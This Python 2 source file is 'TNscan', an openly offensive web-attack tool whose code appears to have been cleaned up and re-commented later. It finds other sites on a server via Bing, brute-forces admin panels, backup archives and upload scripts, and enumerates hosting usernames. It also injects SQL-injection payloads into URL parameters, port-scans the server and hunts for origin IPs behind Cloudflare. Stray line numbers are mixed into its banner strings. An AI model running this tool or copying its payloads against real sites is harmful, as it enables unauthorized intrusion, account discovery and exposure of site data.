#!/usr/bin/env python2
# >>> Bism Allah <<< 
# Code Name : TNscan v1.0
# Coder     : MatriX Coder (17 yo guy from Tunisia)
# Blog      : www.matrixcoder.co.vu  
# Twitter   : MatriX_Coder
# Pastebin  : www.pastebin.com/u/matrixcoder
# this is a developed version of al-swisre's code (well i think it's even better) anyway greets to that man
# Greets to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
#              greets also to tunisia fallega team and to madleets team and to you !
# Written with <3 on my arch machine using geany, a cup of tea and while listening to jazz
import re, urllib2, urllib, os, socket, sys
from platform import system
logo = """
16
\t _____ _   _                     
17
\t|_   _| \ | |                    
18
\t  | | |  \| |___  ___ __ _ _ __  
19
\t  | | | . ` / __|/ __/ _` | '_ \ 
20
\t  | | | |\  \__ \ (_| (_| | | | |
21
\t  \_/ \_| \_/___/\___\__,_|_| |_| v1.0
22
                                                  
23
"""
menu = """
26
 1) Get all websites
27
 2) Get joomla websites
28
 3) Get wordpress websites
29
 4) Find control panel
30
 5) Find zip files
31
 6) Find upload files
32
 7) Get server users
33
 8) Scan from SQL injection
34
 9) Crawl and scan from SQL injection (soon)
35
 10) Scan ports (range of ports)
36
 11) Scan ports (common ports  )
37
 12) Get server banner
38
 13) Bypass Cloudflare
39
 14) About !
40
 99) Exit
41
"""
def unique(seq):
    """
    Return the items of *seq* in first-seen order with duplicates dropped
    (an order-preserving de-duplication).
    """
    kept = []
    seen = set()
    for item in seq:
        if item in seen:
            continue
        seen.add(item)
        kept.append(item)
    return kept
	
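def clearScr() :
    """
    Clear the terminal screen.

    Runs ``cls`` on Windows and ``clear`` everywhere else. The original only
    matched 'Linux' and 'Windows' exactly, so macOS ('Darwin') and the BSDs
    never got cleared. Both commands are fixed strings, so os.system takes
    no user-controlled input here.
    """
    os.system('cls' if system() == 'Windows' else 'clear')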
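class TNscan :
    """
    Interactive recon menu for the web sites sharing one server IP.

    self.sites is filled once from Bing ("ip:<serverip>") and reused by every
    per-site check. All network work is best-effort: a failing target or
    search page is reported and skipped instead of aborting the menu, and the
    Bing paging counter always advances (the original spun forever on a
    URLError). Use only against systems you are authorized to test.
    """

    def __init__(self, serverip) :
        """
        Record *serverip*, collect the sites hosted on it and run the menu
        loop until the user chooses 99 or answers N at the continue prompt.
        Only leaves via sys.exit().
        """
        self.serverip = serverip
        self.sites = []
        self.getSites(False)
        print(menu)
        # choice -> zero-argument handler; 10 needs an extra prompt and 99 exits,
        # so those two are handled explicitly below
        actions = {
            '1': lambda: self.getSites(True),
            '2': self.getJoomla,
            '3': self.getWordpress,
            '4': self.findPanels,
            '5': self.findZip,
            '6': self.findUp,
            '7': self.getUsers,
            '8': self.grabSqli,
            '11': lambda: self.portScanner(2, None),
            '12': self.getServerBanner,
            '13': self.cloudflareBypasser,
            '14': self.aboutME,
        }
        while True :
            choice = raw_input(' Enter choice -> ').strip()
            if choice == '99' :
                print(' Goodbye')
                sys.exit()
            elif choice == '10' :
                ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
                self.portScanner(1, ran)
            elif choice == '9' :
                print(' [!] Not implemented yet')  # crawlSqli is still a stub
            elif choice in actions :
                actions[choice]()
            else :
                print(' [!] Unknown choice')
            con = raw_input(' Continue [Y/n] -> ')
            # the original indexed con[0] and crashed on an empty answer
            if con.strip()[:1].upper() == 'N' :
                sys.exit()
            clearScr()
            print(logo)
            print(menu)

    def aboutME(self) :
        """Print the author/credits banner (text kept verbatim)."""
        clearScr()
        print("""
 >>> Bism Allah <<< 
 Code Name : TNscan v1.0
 Coder     : MatriX Coder (17 yo guy from Tunisia)
 Blog      : www.matrixcoder.co.vu  
 Twitter   : MatriX_Coder
 Pastebin  : www.pastebin.com/u/matrixcoder
 this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
 Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
         greats also to tunisian fallega team, to madleets team and to you !
 Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz 
""")

    # ------------------------------------------------------------------ helpers

    def _bingResults(self, dork) :
        """
        Return every result href Bing lists for ``ip:<serverip> <dork>``.

        Result pages first=1, 51 and 101 are fetched with count=50, as the
        original did. A page that fails to download is reported and skipped;
        the page counter is advanced outside the try so a network error can
        no longer loop forever. Anything urllib2 raises is caught here because
        httplib errors (e.g. a bad status line) escape it unwrapped and are
        not IOError subclasses.
        """
        hrefs = []
        page = 1
        while page <= 101 :
            bing = ("http://www.bing.com/search?q=ip%3A" + self.serverip
                    + "+" + dork + "&count=50&first=" + str(page))
            try :
                readbing = urllib2.urlopen(bing).read()
            except Exception as e :
                print(' [!] Bing page %d failed: %s' % (page, e))
            else :
                hrefs.extend(re.findall('<h2><a href="(.*?)"', readbing))
            page += 50
        return hrefs

    @staticmethod
    def _openOk(url) :
        """
        Open *url* with urllib and return the response when its status is 200,
        else None (the response is closed). Connection failures (IOError,
        which urllib raises) are printed and treated as 'not found' instead of
        propagating out of the scan loop as they did in the original.
        """
        try :
            resp = urllib.urlopen(url)
        except IOError as e :
            print(' [!] %s -> %s' % (url, e))
            return None
        if resp.getcode() == 200 :
            return resp
        resp.close()
        return None

    @staticmethod
    def _hostFromUrl(url) :
        """
        Return the host part of *url*: a leading 'http://' and anything from
        the first '/' onward are dropped. Strings without a scheme or path
        are returned unchanged.
        """
        host = url
        if host.startswith('http://') :
            host = host[len('http://'):]
        return host.split('/', 1)[0]

    @staticmethod
    def _parsePortRange(ran) :
        """
        Parse 'START-END' into an inclusive (start, end) pair of ints.

        Raises ValueError when there is not exactly one dash, a bound is not
        an integer, start > end, or a bound is outside 1..65535.
        """
        parts = ran.strip().split('-')
        if len(parts) != 2 :
            raise ValueError('expected START-END, got %r' % (ran,))
        start, end = int(parts[0]), int(parts[1])
        if not (1 <= start <= end <= 65535) :
            raise ValueError('ports must satisfy 1 <= START <= END <= 65535')
        return start, end

    @staticmethod
    def _portOpen(ip, port, timeout=3.0) :
        """
        Return True when a TCP connect to (ip, port) succeeds within *timeout*
        seconds. The socket is always closed; the original rebound ``sock`` to
        the connect_ex() result and never closed it, and had no timeout, so a
        filtered port could stall the scan for the OS default.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try :
            return sock.connect_ex((ip, port)) == 0
        finally :
            sock.close()

    @staticmethod
    def _injectParam(url, index, payload) :
        """
        Return *url* with *payload* appended to the '&'-separated query
        parameter at 0-based *index*. Only that parameter changes; scheme,
        host and path are untouched (the original str.replace()d the parameter
        text anywhere in the URL). Raises ValueError when *url* has no query
        or *index* is out of range.
        """
        if '?' not in url :
            raise ValueError('no query string in %r' % (url,))
        base, query = url.split('?', 1)
        params = query.split('&')
        if not 0 <= index < len(params) :
            raise ValueError('parameter index %d out of range' % index)
        params[index] += payload
        return base + '?' + '&'.join(params)

    # ------------------------------------------------------------------ actions

    def getSites(self, a) :
        """
        Fill self.sites with the unique 'http://[www.]<host>/' roots Bing
        returns for this IP and, when *a* is true, print them. A host without
        'www' anywhere in it gets a 'www.' prefix, as in the original.
        """
        roots = []
        for href in self._bingResults('') :
            for host in re.findall('http://(.*?)/', href) :
                if 'www' not in host :
                    roots.append('http://www.' + host + '/')
                else :
                    roots.append('http://' + host + '/')
        self.sites = unique(roots)
        if a :
            clearScr()
            # count the de-duplicated list that is printed, not the raw one
            print('[*] Found %d Website\n' % len(self.sites))
            for site in self.sites :
                print(site)

    def getWordpress(self) :
        """
        List sites on this IP that Bing associates with a '?page_id=' URL
        (the WordPress dork). Results are de-duplicated before printing.
        """
        hits = []
        for href in self._bingResults('?page_id=') :
            hits.extend(re.findall(r'(.*?)\?page_id=', href))
        hits = unique(hits)
        clearScr()
        print('[*] Found %d Wordpress Website\n' % len(hits))
        for site in hits :
            print(site)

    def getJoomla(self) :
        """
        List sites on this IP that Bing associates with 'index.php?option=com'
        (the Joomla dork). The original had no error handling here, so one
        failed Bing request aborted the whole program.
        """
        hits = []
        for href in self._bingResults('index.php?option=com') :
            hits.extend(re.findall('(.*?)index.php', href))
        hits = unique(hits)
        clearScr()
        print('[*] Found %d Joomla Website\n' % len(hits))
        for site in hits :
            print(site)

    def findPanels(self) :
        """
        Request each candidate admin/login path on every site in self.sites
        and print the ones answering HTTP 200. Connection errors are reported
        per URL instead of aborting the loop.
        """
        adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
        clearScr()
        for site in self.sites :
            for admin in adminList :
                resp = self._openOk(site + admin)
                if resp is not None :
                    resp.close()
                    print(" [*] Found admin panel -> " + site + admin)

    def findZip(self) :
        """
        Request each common backup/archive filename on every site and print
        the ones answering HTTP 200 (a 200 only means the path exists; the
        body is not inspected).
        """
        zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
        clearScr()
        for site in self.sites :
            for zip1 in zipList :
                resp = self._openOk(site + zip1)
                if resp is not None :
                    resp.close()
                    print(" [*] Found zip file -> " + site + zip1)

    def findUp(self) :
        """
        Request each common upload-script path on every site and, for those
        answering 200, print the URL once if the body contains 'type=file'
        (a file-input field). The body comes from the same response as the
        status check; the original fetched every hit twice and printed it once
        per matching line.
        """
        upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
        clearScr()
        for site in self.sites :
            for up in upList :
                resp = self._openOk(site + up)
                if resp is None :
                    continue
                html = resp.readlines()
                resp.close()
                if any('type=file' in line for line in html) :
                    print(" [*] Found upload -> " + site + up)

    def getUsers(self) :
        """
        Guess hosting account names from each site's hostname.

        The host is stripped of 'www.', dots and dashes, then shortened one
        character at a time (down to three characters); every candidate is
        sent as ``/cgi-sys/guestbook.cgi?user=<candidate>`` and any reply not
        containing 'invalid username' is recorded. The unique hits are
        printed at the end (the original printed a misspelled variable,
        ``userlist``, which raised NameError inside its bare except).

        NOTE(review): the original built the probe URL from the dot-stripped
        name itself (no scheme, no valid host), so urlopen always failed and
        nothing could ever be found. The probe now targets http://<serverip>/;
        confirm that is the intended host for this technique.
        """
        userslist = []
        for site in self.sites :
            name = self._hostFromUrl(site)
            if name.startswith('www.') :
                name = name[4:]
            name = name.replace('.', '').replace('-', '')
            while len(name) > 2 :
                probe = ('http://' + self.serverip
                         + '/cgi-sys/guestbook.cgi?user=' + urllib.quote(name))
                try :
                    resp = urllib2.urlopen(probe).read()
                except Exception as e :
                    # report and give up on this site's candidates
                    print(' [!] %s -> %s' % (name, e))
                    break
                if 'invalid username' not in resp.lower() :
                    print('\t [*] Found -> ' + name)
                    userslist.append(name)
                else :
                    print(name)
                name = name[:-1]
        clearScr()
        for user in unique(userslist) :
            print(user)

    def cloudflareBypasser(self) :
        """
        For every site resolve the bare host, then resolve common sub-domains
        (mail, webmail, ftp, direct, cpanel) and print the first one whose
        address differs from the main host's; that address is a candidate for
        the origin server behind Cloudflare. A different address is only a
        hint, not proof -- verify it before relying on it.

        The original called site.replace() without keeping the result, so it
        resolved 'http://www.host/' verbatim, which always failed silently.
        """
        clearScr()
        subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
        for site in self.sites :
            host = self._hostFromUrl(site)
            # getSites() normalises entries to www.<host>, so prefix the
            # sub-domain onto the bare host rather than onto 'www.<host>'
            if host.startswith('www.') :
                host = host[4:]
            try :
                ip = socket.gethostbyname(host)
            except socket.error as e :
                # without the main address there is nothing to compare against
                print(' [!] %s -> %s' % (host, e))
                continue
            for sub in subdoms :
                doo = sub + '.' + host
                print(' [~] Trying -> ' + doo)
                try :
                    ddd = socket.gethostbyname(doo)
                except socket.error :
                    continue
                if ddd != ip :
                    print(' [*] Cloudflare bypassed -> ' + ddd)
                    break

    def getServerBanner(self) :
        """
        Fetch http://<serverip> and print its Server response header (None
        when the header is absent). A connection failure is reported rather
        than silently swallowed.
        """
        clearScr()
        try :
            httpresponse = urllib.urlopen('http://' + self.serverip)
        except IOError as e :
            print(' [!] Could not connect -> %s' % e)
            return
        print(' [*] Server header -> %s' % httpresponse.headers.getheader('server'))
        httpresponse.close()

    def grabSqli(self) :
        """
        Collect the unique 'php?id=' URLs Bing returns for this IP and hand
        them to checkSqli().
        """
        self.checkSqli(unique(self._bingResults('php?id=')))

    def checkSqli(self, s) :
        """
        Error-based SQL injection check (payloads and error regex taken from
        the webpwn3r project).

        For each URL in *s* every query parameter gets every payload appended
        in turn, one parameter at a time (see _injectParam). A response whose
        body matches the database-error regex is reported once per parameter.
        HTTP error responses such as 500 are scanned too: a broken query
        frequently produces one, and the original's bare except discarded
        them. URLs without a query string are skipped.
        """
        clearScr()
        payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
        # 'qoute' in the original pattern was a typo, so PostgreSQL's
        # "unterminated quoted string" never matched
        check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+quote|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
        for url in s :
            if '?' not in url :
                continue
            nparams = len(url.split('?', 1)[1].split('&'))
            for i in range(nparams) :
                for payload in payloads :
                    power = self._injectParam(url, i, payload.strip())
                    try :
                        html = urllib2.urlopen(power).readlines()
                    except urllib2.HTTPError as e :
                        html = e.readlines()   # error page body is still readable
                    except Exception as e :
                        print(' [!] %s -> %s' % (power, e))
                        continue
                    if any(check.search(line) for line in html) :
                        print(' [*] SQLi found -> ' + power)
                        break   # one hit per parameter is enough

    def crawlSqli(self) :
        """
        Placeholder: crawl a site and feed the discovered URLs to checkSqli().
        Not implemented yet (menu entry 9 reports this).
        """
        pass

    def portScanner(self, mode, ran) :
        """
        TCP connect scan of self.serverip.

        mode 1 scans the inclusive range given as 'START-END' in *ran*
        ('1-1000' now includes port 1000; the original's range() stopped at
        999) and reports a malformed range instead of raising. mode 2 scans the
        fixed common-port list and ignores *ran*. Any other mode does nothing.
        """
        clearScr()
        if mode == 1 :
            try :
                start, end = self._parsePortRange(ran)
            except ValueError as e :
                print(' [!] Bad range: %s' % e)
                return
            ports = range(start, end + 1)
        elif mode == 2 :
            ports = [80,21,22,2082,25,53,110,443,143]
        else :
            return
        for port in ports :
            if self._portOpen(self.serverip, port) :
                print(" [*] Port %i is open" % port)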
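if __name__ == '__main__' :
    # Validate the argument up front. The original wrapped the whole run in
    # `except IndexError`, so any IndexError raised inside the menu loop was
    # reported as a usage error.
    if len(sys.argv) < 2 :
        print(" [*] Usage : python " + sys.argv[0] + " 127.0.0.1")
        sys.exit(1)
    clearScr()
    print(logo)
    try :
        TNscan(sys.argv[1])
    except KeyboardInterrupt :
        # interactive tool: Ctrl-C should end quietly, not with a traceback
        print('\n Goodbye')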